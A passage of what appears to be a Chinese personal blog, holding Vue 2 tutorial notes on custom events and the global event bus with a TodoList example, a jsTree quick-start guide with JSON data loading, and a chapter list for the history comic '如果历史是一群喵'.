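  }
}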

    <template>
    <div class="app">
    <h1>{{ msg }},学生姓名是:{{ studentName }}</h1>
    <!-- 通过父组件给子组件传递函数类型的 props 实现:子给父传递数据 -->
    <School :getSchoolName="getSchoolName"/>
    <!-- 通过父组件给子组件绑定一个自定义事件实现:子给父传递数据(第一种写法:使用 @ 或 v-on) -->
    <Student v-on:atguigu="getStudentName" @demo="m1"/>
    <!-- <Student @atguigu="getStudentName"/> -->
    <!-- 通过父组件给子组件绑定一个自定义事件实现:子给父传递数据(第二种写法:使用 ref) -->
    <!-- <Student ref="student"/> -->
    </div>
    </template>

    <script>
    import School from './components/School.vue';
    import Student from './components/Student.vue';

    export default {
    name: 'App',
    components: { School, Student },
    data() {
    return {
    msg: '你好。',
    studentName: ''
    }
    },
    methods: {
    getSchoolName(name) {
    console.log('App 收到学校名:', name)
    },
    getStudentName(name, ...params) {
    this.studentName = name
    console.log('getStudentName() 被调用了!', name, params)
    },
    m1() {
    console.log('demo 事件被触发了!')
    }
    },
    mounted() {
    // 绑定自定义事件
    // this.$refs.student.$on('atguigu', this.getStudentName)
    // 绑定自定义事件(一次性)
    // this.$refs.student.$once('atguigu', this.getStudentName)
    }
    }
    </script>

    <style>
    .app {
    padding: 5px;
    background-color: gray;
    }
    </style>
    <template>
    <div class="school">
    <h2>学校名称:{{ name }}</h2>
    <h2>学校地址:{{ address }}</h2>
    <button @click="sendSchoolName">把学校名给 App</button>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    props: ['getSchoolName'],
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    methods: {
    sendSchoolName() {
    this.getSchoolName(this.name)
    }
    }
    }
    </script>

    <style scoped>
    .school {
    padding: 5px;
    background-color: skyblue;
    }
    </style>
    <template>
    <div class="student">
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    <h2>当前求和为:{{ number }}</h2>
    <button @click="add">点我 number++</button>
    <button @click="sendStudentName">把学生名给 App</button>
    <button @click="unbind">解绑 atguigu 事件</button>
    <button @click="death">销毁当前 Student 组件的实例(vc)</button>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    sex: '男',
    number: 0
    }
    },
    methods: {
    add() {
    console.log('add() 被调用了!')
    this.number++
    },
    sendStudentName() {
    // 触发 Student 组件实例上的 atguigu 事件
    this.$emit('atguigu', this.name, 123, 456, 789)
    this.$emit('demo')
    },
    unbind() {
    // 解绑一个自定义事件
    // this.$off('atguigu')
    // 解绑多个自定义事件
    // this.$off(['atguigu', 'demo'])
    // 解绑所有自定义事件
    this.$off()
    },
    death() {
    // 销毁了当前 Student 组件的实例,销毁后所有 Student 实例的自定义事件全都不奏效。
    this.$destroy()
    }
    }
    }
    </script>

    <style lang="less" scoped>
    .student {
    padding: 5px;
    margin-top: 20px;
    background-color: pink;
    }
    </style>

    083 TodoList 案例-自定义事件

对于子组件向父组件传递数据,不再通过调用 props 传入的函数,而是使用 this.$emit() 触发自定义事件。

graph TD
  A[App.vue]
  B[MyHeader.vue]
  C[MyFooter.vue]
  D[MyList.vue]
  E[MyItem.vue]
  A -->|addTodo| B
  C -->|checkAllTodo, clearAllTodo| A
  A -->|todos| C
  A -->|todos| D
  D -->|checkTodo, deleteTodo| A
  D -->|todo, checkTodo, deleteTodo| E

父组件不再写成 :checkAllTodo="checkAllTodo" 的形式,而是改为 @checkAllTodo="checkAllTodo"(以绑定自定义事件)。

    <template>
    <div id="root">
    <div class="todo-container">
    <div class="todo-wrap">
    <MyHeader @addTodo="addTodo" />
    <MyList :todos="todos" :checkTodo="checkTodo" :deleteTodo="deleteTodo" />
    <MyFooter :todos="todos" @checkAllTodo="checkAllTodo" @clearAllTodo="clearAllTodo" />
    </div>
    </div>
    </div>
    </template>

    <script>
    import MyHeader from './components/MyHeader'
    import MyList from './components/MyList'
    import MyFooter from './components/MyFooter.vue'

    export default {
    name: 'App',
    components: { MyHeader, MyList, MyFooter },
    data() {
    return {
    // 由于 todos 是 MyHeader 组件和 MyFooter 组件都在使用,所以放在 App 中(状态提升)
    todos: [
    { id: '001', title: '抽烟', done: true },
    { id: '002', title: '喝酒', done: false },
    { id: '003', title: '开车', done: true }
    ]
    }
    },
    methods: {
    // 添加一个 todo
    addTodo(todoObj) {
    this.todos.unshift(todoObj)
    },
    // 勾选 or 取消勾选一个 todo
    checkTodo(id) {
    this.todos.forEach((todo) => {
    if (todo.id === id) todo.done = !todo.done
    })
    },
    // 删除一个 todo
    deleteTodo(id) {
    this.todos = this.todos.filter(todo => todo.id !== id)
    },
    // 全选 or 取消全选
    checkAllTodo(done) {
    this.todos.forEach((todo) => {
    todo.done = done
    })
    },
    // 清除所有已经完成的 todo
    clearAllTodo() {
    this.todos = this.todos.filter((todo) => {
    return !todo.done
    })
    }
    }
    }
    </script>

    <style>
    /*base*/
    body {
    background: #fff;
    }

    .btn {
    display: inline-block;
    padding: 4px 12px;
    margin-bottom: 0;
    font-size: 14px;
    line-height: 20px;
    text-align: center;
    vertical-align: middle;
    cursor: pointer;
    box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);
    border-radius: 4px;
    }

    .btn-danger {
    color: #fff;
    background-color: #da4f49;
    border: 1px solid #bd362f;
    }

    .btn-danger:hover {
    color: #fff;
    background-color: #bd362f;
    }

    .btn:focus {
    outline: none;
    }

    .todo-container {
    width: 600px;
    margin: 0 auto;
    }

    .todo-container .todo-wrap {
    padding: 10px;
    border: 1px solid #ddd;
    border-radius: 5px;
    }
    </style>
    <template>
    <div class="todo-header">
    <input type="text" placeholder="请输入你的任务名称,按回车键确认" v-model="title" @keyup.enter="add" />
    </div>
    </template>

    <script>
    import { nanoid } from 'nanoid'
    export default {
    name: 'MyHeader',
    data() {
    return {
    // 收集用户输入的 title
    title: ''
    }
    },
    methods: {
    add() {
    // 校验数据
    if (!this.title.trim()) return alert('输入不能为空')
    // 将用户的输入包装成一个 todo 对象
    const todoObj = { id: nanoid(), title: this.title, done: false }
    // 通知 App 组件去添加一个 todo 对象
    this.$emit('addTodo', todoObj)
    // this.addTodo(todoObj)
    // 清空输入
    this.title = ''
    }
    },
    }
    </script>

    <style scoped>
    /*header*/
    .todo-header input {
    width: 560px;
    height: 28px;
    font-size: 14px;
    border: 1px solid #ccc;
    border-radius: 4px;
    padding: 4px 7px;
    }

    .todo-header input:focus {
    outline: none;
    border-color: rgba(82, 168, 236, 0.8);
    box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 8px rgba(82, 168, 236, 0.6);
    }
    </style>
    <template>
    <div class="todo-footer" v-show="total">
    <label>
    <!-- <input type="checkbox" :checked="isAll" @change="checkAll"/> -->
    <input type="checkbox" v-model="isAll"/>
    </label>
    <span>
    <span>已完成{{doneTotal}}</span> / 全部{{total}}
    </span>
    <button class="btn btn-danger" @click="clearAll">清除已完成任务</button>
    </div>
    </template>

    <script>
    export default {
    name:'MyFooter',
    props:['todos','checkAllTodo','clearAllTodo'],
    computed: {
    //总数
    total(){
    return this.todos.length
    },
    //已完成数
    doneTotal(){
    //此处使用reduce方法做条件统计
    /* const x = this.todos.reduce((pre,current)=>{
    console.log('@',pre,current)
    return pre + (current.done ? 1 : 0)
    },0) */
    //简写
    return this.todos.reduce((pre,todo)=> pre + (todo.done ? 1 : 0) ,0)
    },
    //控制全选框
    isAll:{
    //全选框是否勾选
    get(){
    return this.doneTotal === this.total && this.total > 0
    },
    //isAll被修改时set被调用
    set(value){
    // this.checkAllTodo(value)
    this.$emit('checkAllTodo', value)
    }
    }
    },
    methods: {
    /* checkAll(e){
    this.checkAllTodo(e.target.checked)
    } */
    //清空所有已完成
    clearAll(){
    // this.clearAllTodo()
    this.$emit('clearAllTodo')
    }
    },
    }
    </script>

    <style scoped>
    /*footer*/
    .todo-footer {
    height: 40px;
    line-height: 40px;
    padding-left: 6px;
    margin-top: 5px;
    }

    .todo-footer label {
    display: inline-block;
    margin-right: 20px;
    cursor: pointer;
    }

    .todo-footer label input {
    position: relative;
    top: -1px;
    vertical-align: middle;
    margin-right: 5px;
    }

    .todo-footer button {
    float: right;
    margin-top: 5px;
    }
    </style>
    <template>
    <ul class="todo-main">
    <MyItem v-for="todoObj in todos" :key="todoObj.id" :todo="todoObj" :checkTodo="checkTodo"
    :deleteTodo="deleteTodo" />
    </ul>
    </template>

    <script>
    import MyItem from './MyItem'

    export default {
    name: 'MyList',
    components: { MyItem },
    // 声明接收 App 传递过来的数据,其中 todos 是自己用的,checkTodo 和 deleteTodo 是给子组件 MyItem 用的
    props: ['todos', 'checkTodo', 'deleteTodo']
    }
    </script>

    <style scoped>
    /*main*/
    .todo-main {
    margin-left: 0px;
    border: 1px solid #ddd;
    border-radius: 2px;
    padding: 0px;
    }

    .todo-empty {
    height: 40px;
    line-height: 40px;
    border: 1px solid #ddd;
    border-radius: 2px;
    padding-left: 5px;
    margin-top: 10px;
    }
    </style>
    <template>
    <li>
    <label>
    <input type="checkbox" :checked="todo.done" @change="handleCheck(todo.id)"/>
    <!-- 如下代码也能实现功能,但是不太推荐,因为有点违反原则,因为修改了 props -->
    <!-- <input type="checkbox" v-model="todo.done"/> -->
    <span>{{todo.title}}</span>
    </label>
    <button class="btn btn-danger" @click="handleDelete(todo.id)">删除</button>
    </li>
    </template>

    <script>
    export default {
    name:'MyItem',
    // 声明接收 todo、checkTodo、deleteTodo
    props:['todo','checkTodo','deleteTodo'],
    methods: {
    // 勾选 or 取消勾选
    handleCheck(id){
    //通知 App 组件将对应的 todo 对象的 done 值取反
    this.checkTodo(id)
    },
    // 删除
    handleDelete(id){
    if(confirm('确定删除吗?')){
    // 通知 App 组件将对应的 todo 对象删除
    this.deleteTodo(id)
    }
    }
    },
    }
    </script>

    <style scoped>
    /*item*/
    li {
    list-style: none;
    height: 36px;
    line-height: 36px;
    padding: 0 5px;
    border-bottom: 1px solid #ddd;
    }

    li label {
    float: left;
    cursor: pointer;
    }

    li label li input {
    vertical-align: middle;
    margin-right: 6px;
    position: relative;
    top: -1px;
    }

    li button {
    float: right;
    display: none;
    margin-top: 3px;
    }

    li:before {
    content: initial;
    }

    li:last-child {
    border-bottom: none;
    }

    li:hover{
    background-color: #ddd;
    }

    li:hover button{
    display: block;
    }
    </style>

    084-085 全局事件总线

[图:全局事件总线示意图]

    ​上图展示了全局事件总线(X)的示意图,从而实现各个组件间相互通信。X 应满足:

    1. 所有组件都能访问到
    2. 支持:$on$off$emit
    // 引入 Vue
    import Vue from 'vue'
    // 引入 App
    import App from './App.vue'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 创建 vm
    new Vue({
    el: '#app',
    render: h => h(App),
    beforeCreate() {
    Vue.prototype.$bus = this; // 安装全局事件总线
    }
    })
    <template>
    <div>
    <Student></Student>
    <hr>
    <School></School>
    </div>
    </template>

    <script>
    import Student from './components/Student.vue'
    import School from './components/School.vue'

    export default {
    name: 'App',
    components: {
    Student,
    School
    }
    }
    </script>
    <template>
    <div class="demo">
    <h2 class="school">学校名称:{{ name }}</h2>
    <h2>学校地址:{{ address }}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    data() {
    return {
    name: '河百带学',
    address: '河北保定',
    }
    },
    mounted() {
//通过 $bus.$on 监听 Student 组件经事件总线发来的数据
    this.$bus.$on('getStudentName', (name) => {
    console.log(`我是 School 组件,收到了数据 ${name}`)
    })
    }
    }
    </script>

    <style lang="less" scoped>
    .demo {
    background-color: orange;
    .school {
    font-size: larger;
    }
    }
    </style>
    <template>
    <div class="demo">
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    <button @click="sendStudentName">把学生名给 School 组件</button>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    sex: '男'
    }
    },
    methods: {
    sendStudentName() {
//通过 this.$bus.$emit 经事件总线向 School 组件发送数据
    this.$bus.$emit('getStudentName', this.name)
    }
    }
    }
    </script>

    <style lang="less" scoped>
    .demo {
    background-color: skyblue;
    }
    </style>


    全局事件总线(GlobalEventBus)

    1. 一种组件间通信的方式,适用于任意组件间通信。

    2. 安装全局事件总线:

      new Vue({
      .....
      beforeCreate(){
      Vue.prototype.$bus=this //安装全局事件总线,$bus 就是当前应用的 vm
      },
      ......
      })
    3. 使用事件总线:

      • 接收数据:A 组件想接收数据,则在 A 组件中给 $bus 绑定自定义事件,事件的回调留在 A 组件自身。

methods: {
demo(data){......}
},
        mounted() {
        this.$bus.$on('xxxx',this.demo)
        }
      • 提供数据: this.$bus.$emit('xxxx', 数据)

    4. 最好在 beforeDestroy() 钩子中,用 $off 去解绑当前组件所用到的事件。
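
A minimal sketch of point 4 — pair every $on with a matching $off so a destroyed component leaves no dead handlers on the bus:

// Any component listening on the bus
export default {
  methods: {
    demo(data) {
      console.log('received:', data)
    }
  },
  mounted() {
    this.$bus.$on('xxxx', this.demo)
  },
  beforeDestroy() {
    // unbind only this component's handler; a bare this.$bus.$off('xxxx')
    // would also strip other components' listeners for the same event
    this.$bus.$off('xxxx', this.demo)
  }
}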

    086 TodoList 案例-事件总线

    ​对于父传子:props,对于子传父:自定义事件。其余情况,可使用全局事件总线。

    ​这里将 TodoList 案例添加事件总线,实现 App.vueMyItem.vue 间的消息传递。

graph TD
  A[App.vue]
  B[MyHeader.vue]
  C[MyFooter.vue]
  D[MyList.vue]
  E[MyItem.vue]
  F[$bus]
  A -->|addTodo| B
  F -->|checkTodo, deleteTodo| A
  C -->|checkAllTodo, clearAllTodo| A
  A -->|todos| C
  A -->|todos| D
  D -->|checkTodo, deleteTodo| A
  E -->|checkTodo, deleteTodo| F
  D -->|todo| E
    // 引入 Vue
    import Vue from 'vue'
    // 引入 App
    import App from './App.vue'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 创建 vm
    new Vue({
    el: '#app',
    render: h => h(App),
    beforeCreate() {
    Vue.prototype.$bus = this; // 安装全局事件总线
    }
    })
    <template>
    <div id="root">
    <div class="todo-container">
    <div class="todo-wrap">
    <MyHeader @addTodo="addTodo" />
    <MyList :todos="todos" :checkTodo="checkTodo" :deleteTodo="deleteTodo" />
    <MyFooter :todos="todos" @checkAllTodo="checkAllTodo" @clearAllTodo="clearAllTodo" />
    </div>
    </div>
    </div>
    </template>

    <script>
    import MyHeader from './components/MyHeader'
    import MyList from './components/MyList'
    import MyFooter from './components/MyFooter.vue'

    export default {
    name: 'App',
    components: { MyHeader, MyList, MyFooter },
data() {...},
mounted() {
    this.$bus.$on('checkTodo', this.checkTodo)
    this.$bus.$on('deleteTodo', this.deleteTodo)
    },
    beforeDestroy() {
    this.$bus.$off('checkTodo', this.checkTodo)
    this.$bus.$off('deleteTodo', this.deleteTodo)
    }
    ...
    }
    ...
    <template>
    <li>
    <label>
    <input type="checkbox" :checked="todo.done" @change="handleCheck(todo.id)"/>
    <!-- 如下代码也能实现功能,但是不太推荐,因为有点违反原则,因为修改了 props -->
    <!-- <input type="checkbox" v-model="todo.done"/> -->
    <span>{{todo.title}}</span>
    </label>
    <button class="btn btn-danger" @click="handleDelete(todo.id)">删除</button>
    </li>
    </template>

    <script>
    export default {
    name:'MyItem',
    // 声明接收 todo
    props:['todo'],
    methods: {
    // 勾选 or 取消勾选
    handleCheck(id){
    //通知 App 组件将对应的 todo 对象的 done 值取反
    // this.checkTodo(id)
    this.$bus.$emit('checkTodo', id)
    },
    // 删除
    handleDelete(id){
    if(confirm('确定删除吗?')){
    // 通知 App 组件将对应的 todo 对象删除
    // this.deleteTodo(id)
    this.$bus.$emit('deleteTodo', id)
    }
    }
    },
    }
    </script>

    ...
/posts/Web-jsTree/

Resources

Quick start

Official example

Import the required files from CDNJS or from local copies:

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jstree/3.2.1/themes/default/style.min.css" />
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jstree/3.2.1/jstree.min.js"></script>

The first example:

<!DOCTYPE html>
<html>

<head>
  <meta charset="utf-8">
  <title>jsTree test</title>
  <!-- 2 load the theme CSS file -->
  <link rel="stylesheet" href="dist/themes/default/style.min.css" />
</head>

<body>
  <!-- 3 setup a container element -->
  <div id="jstree">
    <!-- a container with ID "jstree" that will display the tree -->
    <!-- in this example the tree is populated from inline HTML -->
    <ul>
      <!-- an unordered list holding the tree's nodes -->
      <li>Root node 1
        <ul>
          <li id="child_node_1">Child node 1</li>
          <li>Child node 2</li>
        </ul>
      </li>
      <li>Root node 2</li>
    </ul>
  </div>
  <button>demo button</button>
  <!-- a button used to trigger interactions with the tree -->

  <!-- 4 include the jQuery library -->
  <script src="dist/libs/jquery.min.js"></script>
  <!-- 5 include the minified jstree source -->
  <script src="dist/jstree.min.js"></script>
  <script>
    $(function () {
      // 6 create an instance when the DOM is ready
      $('#jstree').jstree(); // initialize #jstree as a jsTree instance and render the tree
      // 7 bind to events triggered on the tree
      $('#jstree').on("changed.jstree", function (e, data) { // when the selection changes, log the selected node IDs
        console.log(data.selected);
      });
      // 8 interact with the tree - either way is OK
      $('button').on('click', function () { // on click:
        $('#jstree').jstree(true).select_node('child_node_1'); // select the node with ID child_node_1
        $('#jstree').jstree('select_node', 'child_node_1');    // another way to select a node
        $.jstree.reference('#jstree').select_node('child_node_1'); // select via a jsTree reference
      });
    });
  </script>
</body>

</html>
Notes on the example

This example uses the jsTree plugin to create a tree structure. The main parts:

1. <!DOCTYPE html>: declares the HTML document type.
2. <head>: document metadata.
  • <meta charset="utf-8">: sets UTF-8 encoding.
  • <title>jsTree test</title>: sets the page title.
  • <link rel="stylesheet" href="dist/themes/default/style.min.css" />: loads the theme stylesheet.
3. <body>: the page content.
  • <div id="jstree">: the container element that displays the tree.
    • <ul>: an unordered list holding the tree's nodes.
      • <li>: a list item representing a node.
        • <ul>: a nested list representing child nodes.
          • <li id="child_node_1">Child node 1</li>: a concrete child node.
  • <button>demo button</button>: a button for demonstrating interaction with the tree.
4. <script src="dist/libs/jquery.min.js"></script>: loads jQuery.
5. <script src="dist/jstree.min.js"></script>: loads the jsTree plugin.
6. $(function () { ... });: jQuery's DOM-ready wrapper, so the code runs after the DOM has loaded.
  • $('#jstree').jstree();: initializes #jstree as a jsTree instance.
  • $('#jstree').on("changed.jstree", function (e, data) { ... });: binds a callback for the changed.jstree event, fired when the selection changes.
  • $('button').on('click', function () { ... });: binds a click handler to the button.
7. console.log(data.selected);: logs the IDs of the currently selected nodes.
8. $('#jstree').jstree(true).select_node('child_node_1');: selects the given node via the jsTree instance.
9. $.jstree.reference('#jstree').select_node('child_node_1');: selects the given node via a jsTree reference.

In short, the example builds a simple tree with jsTree and wires up a few interactions: clicking the button or selecting nodes triggers events, and the selected node IDs are printed to the console.

JSON data

Create a <div> to hold the tree:

    <div id="jsonjsTree"></div>

    ​建一个 json 文件存放数据。

    ​这里引入了 Font Awesome 自定义图标:

[
  {
    "id": "0",
    "text": "根节点1",
    "state": {
      "opened": true
    },
    "children": [
      {
        "text": "child1",
        "icon": "fas fa-house",
        "li_attr": {
          "style": "color: var(--text-link);"
        }
      },
      { "text": "child2" }
    ]
  },
  {
    "id": "1",
    "text": "根节点2",
    "children": [
      { "text": "child1" },
      { "text": "child2" }
    ]
  }
]
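Since the node icons use Font Awesome classes (fas fa-house), the Font Awesome stylesheet also has to be on the page; for example (the version number here is only an illustration):

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" />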

Read the JSON data:

$("#jsonjsTree").jstree({
  'core': {
    'data': [
      {
        "id": "0",
        "text": "根节点1",
        "state": {
          "opened": true
        },
        "children": [
          {
            "text": "child1",
            "icon": "fas fa-house",
            "li_attr": {
              "style": "color: var(--text-link);"
            }
          },
          { "text": "child2" }
        ]
      },
      {
        "id": "1",
        "text": "根节点2",
        "children": [
          { "text": "child1" },
          { "text": "child2" }
        ]
      }
    ]
  }
});

Now load the contents of data.json into 'data' instead:

$("#jsonjsTree").jstree({
  'core': {
    'data': function (node, cb) {
      fetch('data.json')                         // path to the JSON file
        .then(response => response.json())       // parse the JSON data
        .then(data => cb(data))                  // pass the data to jsTree's callback
        .catch(error => alert('无法加载数据!')); // error handling
    }
  }
});
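As an alternative sketch: jsTree's core.data also accepts a jQuery-AJAX-style settings object, letting the plugin fetch the file itself instead of going through fetch:

$("#jsonjsTree").jstree({
  'core': {
    // jsTree forwards this object to jQuery.ajax and uses the parsed JSON response
    'data': {
      'url': 'data.json',
      'dataType': 'json'
    }
  }
});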

The final result:


Looks good! Now let's wrap it up as a class:

class jsTreeObject {
  constructor(id, data) {
    this.div = $('<div></div>').attr('id', id);
    this.div.jstree({
      'core': {
        'data': function (_, cb) {
          fetch(data)
            .then(response => response.json()) // parse the JSON data
            .then(data => cb(data))            // pass the data to jsTree's callback
            .catch(error => console.error('加载' + data + '失败:' + error)); // error handling
        }
      }
    });
  }

  render() {
    // insert the tree right before the <script> element that is currently executing
    $(document.currentScript).before(this.div);
  }
}

Then a single line in the page renders it:

    <script>new jsTreeObject('ID', 'XXX.json').render();</script>
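One caveat of this design: document.currentScript is only defined while a classic script is executing synchronously, so render() has to be called from an inline <script> exactly as above; calling it later from a callback, or from a module script, would insert nothing.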
/posts/Book-%E5%A6%82%E6%9E%9C%E6%AD%B7%E5%8F%B2%E6%98%AF%E4%B8%80%E7%BE%A4%E5%96%B5/

.scroll { max-height: 60vh; overflow: auto; padding: 0 15px; }

    归档

    第一卷 夏商西周

    回数标题
    第一回华夏诞生
    第二回统一战争
    第三回三皇五帝
    第四回大禹建国
    第五回夏家天下
    第六回少康复国
    第七回商汤灭夏
    第八回伊尹辅政
    第九回武丁中兴
    第十回末代商王
    第十一回西周灭商
    第十二回周公治国
    第十三回西周东周

    第二卷 春秋战国

    回数标题
    第十四回霸王初现
    第十五回大器晚成
    第十六回一鸣惊人
    第十七回威震东南
    第十八回吴越相争
    第十九回三家分晋
    第二十回商鞅变法
    第二十一回六国合纵
    第二十二回以横破纵
    第二十三回昭王称霸
    第二十四回乱世巨贾
    第二十五回新王登基
    第二十六回千秋一统

    第三卷 秦楚两汉

    回数标题
    第二十七回风暴前夕
    第二十八回揭竿而起
    第二十九回霸王诞生
    第三十回大风起兮
    第三十一回双雄并立
    第三十二回楚汉争雄
    第三十三回吕氏专政
    第三十四回文景之治
    第三十五回汉武大帝
    第三十六回王莽代汉
    第三十七回风起绿林
    第三十八回光武复国

    第四卷 东汉末年

    回数标题
    第三十九回黄昏时刻
    第四十回乱世重临
    第四十一回关东联军
    第四十二回逐鹿中原
    第四十三回孟德崛起
    第四十四回官渡对峙
    第四十五回统一北方
    第四十六回江东猛虎
    第四十七回孙权守业
    第四十八回没落贵族
    第四十九回必争之地
    第五十回孙刘联盟
    第五十一回赤壁之战

    第五卷 乱世三国

    回数标题
    第五十二回刘备立足
    第五十三回巧取益州
    第五十四回联盟破裂
    第五十五回曹魏代汉
    第五十六回夷陵之战
    第五十七回永安托孤
    第五十八回诸葛治蜀
    第五十九回以攻为守
    第六十回司马侍曹
    第六十一回正始之变
第六十二回强弩之末
    第六十三回同归于晋
    第六十四回暗流涌动

    第六卷 魏晋南北

    回数标题
    第六十五回烈烈南风
    第六十六回八王之乱
    第六十七回刘汉灭晋
    第六十八回苻氏争雄
    第六十九回淝水之战
    第七十回刘裕建业
    第七十一回威服八方
    第七十二回仓皇北顾
    第七十三回太和改制
    第七十四回孝文改革
    第七十五回北魏分裂
    第七十六回杨氏建隋
    第七十七回南北归一

    第七卷 隋唐风云

    回数标题
    第七十八回开皇之治
    第七十九回储君之争
    第八十回大业难成
    第八十一回潜龙在渊
    第八十二回李氏崛起
    第八十三回雄鹰展翅
    第八十四回喋血禁门
    第八十五回贞观之治
    第八十六回日月临空
    第八十七回武周女皇
    第八十八回韦后专权
    第八十九回太平公主

    第八卷 盛世大唐

    回数标题
    第九十回先天政变
    第九十一回开元之治
    第九十二回边疆兵变
    第九十三回卷土重来
    第九十四回代宗平乱
    第九十五回藩镇割据
    第九十六回元和中兴
    第九十七回甘露之变
    第九十八回朋党之争
    第九十九回黄巢起义
    第一百回朱温叛变
    第一百零一回盛唐终声

    第九卷 五代十国

    回数标题
    第一百零二回后唐灭梁
    第一百零三回邺都之变
    第一百零四回契丹崛起
    第一百零五回引狼入室
    第一百零六回辽朝入主
    第一百零七回后汉建立
    第一百零八回郭氏开国
    第一百零九回世宗革新
    第一百一十回南唐兴起
    第一百一十一回南北一战
    第一百一十二回陈桥兵变
    第一百一十三回平定四方

    第十卷 宋辽金夏

    回数标题
    第一百一十四回宋初集权
    第一百一十五回烛影斧声
    第一百一十六回萧后兴辽
    第一百一十七回澶渊之盟
    第一百一十八回党项崛起
    第一百一十九回元昊立夏
    第一百二十回庆历和议
    第一百二十一回熙宁变法
    第一百二十二回元祐更化
    第一百二十三回女真建国
    第一百二十四回辽灭金兴
    第一百二十五回靖康之变

    第十一卷 南宋金元

    回数标题
    第一百二十六回尽忠报国
    第一百二十七回绍兴和议
    第一百二十八回海陵夺位
    第一百二十九回采石之战
    第一百三十回隆兴和议
    第一百三十一回乾淳之治
    第一百三十二回一代天骄
    第一百三十三回蒙古扩张
    第一百三十四回蒙古灭金
    第一百三十五回端平入洛
    第一百三十六回元朝建立
    第一百三十七回混一天下

    第十二卷 元末明初

    回数标题
    第一百三十八回世祖立制
    第一百三十九回成宗之立
    第一百四十回权臣乱政
    第一百四十一回旧政更化
    第一百四十二回红巾起义
    第一百四十三回高邮之战
    第一百四十四回察罕伐宋
    第一百四十五回崛起布衣
    第一百四十六回荆楚之雄
    第一百四十七回略定南方
    第一百四十八回统一方夏
    第一百四十九回洪武之治

    第十三卷 大明皇朝

    回数标题
    第一百五十回接班之难
    第一百五十一回建文削藩
    第一百五十二回靖难之役
    第一百五十三回永乐大帝
    第一百五十四回仁宣之治
    第一百五十五回土木之变
    第一百五十六回少保破敌
    第一百五十七回夺门之变
    第一百五十八回宪宗继业
    第一百五十九回武宗驭国
    第一百六十回大礼之争
    第一百六十一回功业中辍

    第十四卷 明末清初

    回数标题
    第一百六十二回威震海疆
    第一百六十三回江陵权柄
    第一百六十四回神宗怠政
    第一百六十五回女真之叛
    第一百六十六回一战定业
    第一百六十七回宁远之战
    第一百六十八回天启党争
    第一百六十九回崇祯新政
    第一百七十回十面之网
    第一百七十一回崇德建清
    第一百七十二回松锦之战
    第一百七十三回大顺灭明

    列表

    1. 如果历史是一群喵
    2. 如果历史是一群喵 | 祖先喵们的统一战争
    3. 吃饭穿衣,竟然都是皇上教的!
    4. 他年少丧父,被迫子承父业,最后靠湿身建立了一个国家
    5. 天下都是我家哒!
    6. 跟你讲一下三千多年前的狗血剧
    7. 他进过局子,装过孙子,最后竟成了天王老子
    8. 这真的只是一段纯洁的君臣关系
    9. 让基友管家,让老婆打架,牛逼的国王就是这么奇葩
    10. 这个锅,他背了几千年…
    11. 猥琐发育,不要浪…
    12. 没想到吧!你经常梦见的男人竟然是个玛丽苏…
    13. 惹怒娘家丢江山,皆因作风不检点
    14. 奉天子以令诸侯,我说的不是曹操…
    15. 他爸追杀他,他弟也追杀他,可他成了霸主…
    16. 一个有心机的肥宅
    17. 倒霉蛋终成霸主…可惜死于暗箭
    18. 两个纠缠不清的男人…
    19. 小弟为何突然叛变,大哥如何阴沟翻船
    20. 发家致富靠砍人…
    21. 一个靠口活横行天下的男人
    22. 秦国的阴谋
    23. 不做我的朋友休想活过今天,做了我的朋友可以活到明天
    24. 做生意这事…他才是史上最强
    25. 刺激,史上第一霸总现在上线了
    26. 举手投降了解下
    27. 到底是谁杀死了秦国
    28. 一场暴雨引发的血案
    29. sorry,他在战场上真的可以为所欲为
    30. 见过流氓创业吗
    31. 流氓打过来了
    32. 昨天你把我踢开,今天我让你狗带
    33. 我的老公是渣男
    34. 父子接力,搞死亲戚
    35. “汉族”因他而得名
    36. 明君的人设,昏君的操作
    37. 那一年,我绿了
    38. 那年,我去了趟河北,结果不得了了……
    39. 读书的果然干不过造谣的
    40. 揭竿起黄巾当立,趁虚入董卓乱国
    41. 一场团战,万万没想到,成了团建……
    42. 是奸雄还是英雄,这个争议他背了一千多年…
    43. 从太监的孙子到称霸一方的军阀,他是怎么做到的呢
    44. 从一起长大的发小,到横行天下的搭档,再到你死我活劲敌
    45. 那年基友想跨过黄河来打我…
    46. 父亲出外务工意外死亡,长子继承家业称霸一方
    47. 父兄双双早逝,单亲少年独撑家业…
    48. 乡村青年创业屡遭挫折,企业老板强留惨遭背叛
    49. 跳个槽而已,前老板竟要追杀他…
    50. 怎么办…只能迎男而上了!
    51. 一把火,改变了三个男人的命运
    52. 刘备借荆州,是怎么一回事?
    53. 君子和小人,刘备究竟是哪一个?
    54. 孙权是不是有点傻白甜?
    55. 【喵咪三国篇】大汉就这么没了 …
    56. 【三国篇下】打完这仗,三国就算开始了~
    57. 刘备死了,凭啥让诸葛亮接班呢
    58. 诸葛亮执政是个什么水平?
    59. 诸葛亮,始终无法胜天半子
    60. 这个男人,熬死了曹操三代人……
    61. 三国里最会演戏的竟然是他…
    62. 三国就这么没了
    63. 曹刘孙这么努力,最后却亏的裤衩都不剩…
    64. 喝酒、炫富、吹牛逼,但我暂时是个好王朝…
    65. 我虽然长得丑…但我老公蠢呀…
    66. 毁掉一个王朝,只需一场家暴…
    67. 五胡十六国是怎么开始的?
    68. 八岁请家教,十二岁当将军,三十八岁就当了天王…
